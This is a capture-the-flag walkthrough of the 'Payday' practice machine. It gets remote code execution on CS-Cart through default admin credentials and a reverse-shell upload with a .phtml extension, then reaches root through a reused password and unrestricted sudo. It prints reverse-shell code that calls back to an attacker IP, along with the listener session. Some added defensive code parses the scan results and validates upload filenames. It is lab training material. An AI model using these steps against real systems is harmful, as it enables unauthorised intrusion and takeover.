PayDay
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.222.39
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 20:34 +03
Nmap scan report for 192.168.222.39
Host is up, received echo-reply ttl 61 (0.14s latency).
Scanned at 2025-10-02 20:34:45 +03 for 205s
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
| 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http syn-ack ttl 61 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
110/tcp open pop3 syn-ack ttl 61 Dovecot pop3d
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_pop3-capabilities: RESP-CODES STLS TOP UIDL PIPELINING CAPA SASL
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap syn-ack ttl 61 Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
|_imap-capabilities: completed THREAD=REFERENCES IDLE LITERAL+ OK IMAP4rev1 STARTTLS Capability LOGINDISABLEDA0001 UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPEND CHILDREN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap syn-ack ttl 61 Dovecot imapd
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_imap-capabilities: THREAD=REFERENCES IDLE LITERAL+ AUTH=PLAINA0001 IMAP4rev1 completed Capability OK UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPEND CHILDREN
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
995/tcp open ssl/pop3 syn-ack ttl 61 Dovecot pop3d
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_pop3-capabilities: RESP-CODES TOP UIDL USER PIPELINING CAPA SASL(PLAIN)
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80):
I will start with port 80 by running gobuster:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ gobuster dir -u http://192.168.222.39/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.222.39/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
<snipped>
/addons (Status: 301) [Size: 335] [--> http://192.168.222.39/addons/]
/admin.php (Status: 200) [Size: 9483]
/admin.php (Status: 200) [Size: 9483]
/admin (Status: 200) [Size: 9483]
/catalog (Status: 301) [Size: 336] [--> http://192.168.222.39/catalog/]
/cgi-bin/.html (Status: 403) [Size: 313]
/cgi-bin/ (Status: 403) [Size: 308]
/chart (Status: 200) [Size: 0]
/chart.php (Status: 200) [Size: 0]
/classes (Status: 301) [Size: 336] [--> http://192.168.222.39/classes/]
/config.php (Status: 200) [Size: 13]
/config (Status: 200) [Size: 13]
<snipped>
/index (Status: 200) [Size: 28074]
/index.php (Status: 200) [Size: 28074]
/index.php (Status: 200) [Size: 28074]
<snipped>
/install (Status: 200) [Size: 7731]
/install.php (Status: 200) [Size: 7731]
<snipped>
/skins (Status: 301) [Size: 334] [--> http://192.168.222.39/skins/]
<snipped>
Progress: 18452 / 18452 (100.00%)
===============================================================
Finished
===============================================================
We find several interesting files and directories.
Explore the website:

We can see that the site is running CS-Cart.
The /skins directory has directory listing enabled, and the server signature is misconfigured to reveal the underlying operating system and web server version:

We can find the exact version of the application by navigating to install.php:

Or by checking the last update to the copyright:


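To close out enumeration, here is an added triage script (not part of the original walkthrough) that parses nmap -sCV output in the format shown above and flags the weaknesses this scan exposes: SSLv2 enabled, a 1024-bit SHA-1 certificate that expired in 2008, a DSA host key, and end-of-life OpenSSH, Apache and PHP versions. The embedded scan excerpt is a constructed sample in that format, and the end-of-life banner list is this example's own assumption.

```python
import re

# Constructed sample in the shape of the nmap -sCV output above (not the full scan)
SAMPLE_SCAN = """\
22/tcp open ssh syn-ack ttl 61 OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
80/tcp open http syn-ack ttl 61 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
995/tcp open ssl/pop3 syn-ack ttl 61 Dovecot pop3d
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid after: 2008-05-25T02:02:48
| SSLv2 supported
|_pop3-capabilities: RESP-CODES TOP UIDL USER PIPELINING CAPA SASL(PLAIN)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+\S+\s+ttl\s+\d+\s+(.*)$")
EOL_BANNERS = ("OpenSSH 4.", "Apache httpd 2.2", "PHP/5.")  # assumed list; all long unsupported

def parse_scan(text):  # group each open port's banner with its NSE script lines
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"service": m.group(2), "banner": m.group(3), "script": []}
        elif current is not None and line.startswith("|"):
            ports[current]["script"].append(line.lstrip("|_ ").strip())
    return ports

def triage(ports, scan_date):  # scan_date as YYYY-MM-DD; returns {port: [finding, ...]}
    findings = {}
    for port, info in ports.items():
        issues = [f"end-of-life software: {b}" for b in EOL_BANNERS if b in info["banner"]]
        for line in info["script"]:
            if line == "SSLv2 supported":
                issues.append("SSLv2 enabled")
            elif line.startswith("Public Key bits:") and int(line.split(":")[1]) < 2048:
                issues.append("certificate key shorter than 2048 bits")
            elif line.startswith("Signature Algorithm: sha1"):
                issues.append("SHA-1 certificate signature")
            elif line.startswith("Not valid after:"):
                expiry = line.split(": ", 1)[1][:10]  # keep the YYYY-MM-DD part
                if expiry < scan_date:  # ISO dates compare correctly as strings
                    issues.append(f"certificate expired {expiry}")
            elif line.endswith("(DSA)"):
                issues.append("DSA SSH host key")
        if issues:
            findings[port] = issues
    return findings
```

Calling triage(parse_scan(SAMPLE_SCAN), "2025-10-02") returns the per-port findings; feed it the real -oN output to get the same list for the full scan.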
Exploitation:
One of the vulnerabilities this version is affected by is an authenticated RCE, let's check it out:
As stated in one of the GitHub comments:
Visit "cs-cart" /admin.php and login (Remember: You need to login on ADMIN section not on the regular USER section).
Under Look and Feel section click on "template editor".
And under that section, upload your malicious .php file, make sure you rename it to .phtml before you upload.
If successful, you should be able to get a RCE.
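The step above works because the template editor's filename check lets a .phtml file through while the web server still runs it as PHP. As an added illustration (not CS-Cart's code; the allowlist of template types is assumed for the example), here is a denylist check in the weak form beside an allowlist check that rejects the rename and double extensions:

```python
import re

# Hypothetical allowlist of what a theme/template editor legitimately needs (assumption
# for this example; the real CS-Cart editor's rules are not shown on this page)
TEMPLATE_EXTENSIONS = {"tpl", "css", "js", "png", "jpg", "gif"}

def denylist_accepts(filename):
    """Weak check: rejects only names ending in .php, so shell.phtml passes and the PHP
    handler (which the Apache/PHP packaging also maps to .phtml) still executes it."""
    return not filename.lower().endswith(".php")

def allowlist_accepts(filename):
    """Hardened check: drop any directory part, require a plain base name with at least
    one extension, and demand that every dotted suffix is an allowed template type, so
    shell.phtml, shell.php.jpg and shell.jpg.phtml are all rejected."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not re.fullmatch(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+", name):
        return False  # also stops hidden names, null bytes, spaces and trailing dots
    return all(ext in TEMPLATE_EXTENSIONS for ext in name.lower().split(".")[1:])
```

Independently of the filename check, a directory that only serves theme files should have script execution disabled at the web server, so a file that slips through is served as text rather than run.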

We can try common default credentials such as admin:admin, or search online for the default credentials of CS-Cart.
admin:admin worked for me:

Then we will click on template editor under look and feel:


We will upload a PHP reverse shell, but first edit it to set our own IP address and port, and change its extension to .phtml as mentioned in the GitHub comment:
┌──(kali㉿kali)-[/usr/share/webshells/php]
└─$ cp php-reverse-shell.php ~/Desktop/CTF/Machines/OffsecPG/Practice/Payday/shell.phtml
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ cat shell.phtml
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.177'; // CHANGE THIS
$port = 443; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Browse to the file with the Browse button, select it, and click Upload:


As we can see, it was uploaded to the /skins/ directory that we discovered earlier with gobuster.

Before opening it, we will start a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ nc -nlvp 443
listening on [any] 443 ...
Click on shell.phtml:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.177] from (UNKNOWN) [192.168.222.39] 42047
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
13:57:04 up 25 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@payday:/$ export TERM=xterm
export TERM=xterm
www-data@payday:/$ ^Z
zsh: suspended nc -nlvp 443
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 443
www-data@payday:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@payday:/$ stty rows 43 cols 172
Lateral Movement to patrick:
After some local enumeration, we find that there is a user called patrick on the machine:
www-data@payday:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
<snipped>
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bas
www-data@payday:~# ls -la /home
total 12
drwxr-xr-x 3 root root 4096 2016-04-12 07:33 .
drwxr-xr-x 21 root root 4096 2008-04-24 22:02 ..
drwxr-xr-x 2 patrick patrick 4096 2020-03-25 10:25 patrick
I will try the username as the password:
www-data@payday:/$ su patrick
Password: patrick
patrick@payday:/$
We are patrick.
Alternatively, the password could be brute-forced with tools such as hydra, medusa, or ncrack.
Privilege Escalation:
Let's check whether patrick can run any commands with sudo:
patrick@payday:/$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick: patrick
User patrick may run the following commands on this host:
(ALL) ALL
So patrick can run any command with sudo, which lets us su to root:
patrick@payday:/$ sudo su
root@payday:/#
Get the flags:
root@payday:~# cat proof.txt
4df293678a81880268b8796be4bc2b20
root@payday:~# cat /home/patrick/local.txt
6e520701348836197df61cbafd055feb